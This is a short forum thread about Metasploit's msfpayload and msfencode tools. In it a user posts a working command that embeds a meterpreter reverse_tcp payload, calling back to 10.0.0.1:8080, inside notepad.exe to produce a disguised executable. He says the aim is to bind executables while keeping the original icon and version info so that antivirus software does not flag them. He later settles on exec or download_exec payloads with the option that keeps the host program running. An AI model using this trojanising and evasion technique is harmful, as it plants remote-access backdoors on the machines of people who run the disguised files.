Metasploit msfpayload | using an existing executable?

[dragon6]

Hello,

I'm trying to bind two executables with msfpayload and the msfencode features. However, I'm not sure that msfpayload will accept a preexisting executable instead of an input like 'windows/meterpreter/reverse_tcp'.

This is what I would normally use:
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=8080 R | ./msfencode -t exe -x notepad.exe -o notepad32.exe

This is what I'm trying to do:
./msfpayload MYFILE.exe X | ./msfencode -t exe -x notepad.exe -o notepad32.exe

Does msfpayload allow this type of executable input? If so, what am I doing wrong?

[mfBaranian]

No. It does not. As expected it handles payloads/shellcode. I am not even sure what would you try to accomplish with this?

[dragon6]

That's too bad..

It would be a quick fix for what I need. I'm basically trying to bind two executables together while retaining the icon and 'Version' info of the original executable. I figured AVs would not scream bloody murder if I used something other than the widely available exe binders without having to purchase unique stubs...

[Qsl1pKNOTP]

Google is your friend.

"metasploit using existing executables" returns

Metasploit Framework - Support #1244: msfencode an exploit into an existing exe - Metasploit Redmine Interface

Which when read states exactly what the combo is used for.

[lupin]

More here and here.

[dragon6]

Thanks for the info, those links increased the size of my brain.

Since my original idea is not feasible, I've opted to go with the windows/exec payload(or maybe download_exec). I wasn't aware of the -k option. That effectively allows me to change strategy. My situation seems to be resolved...

Many thanks for the help!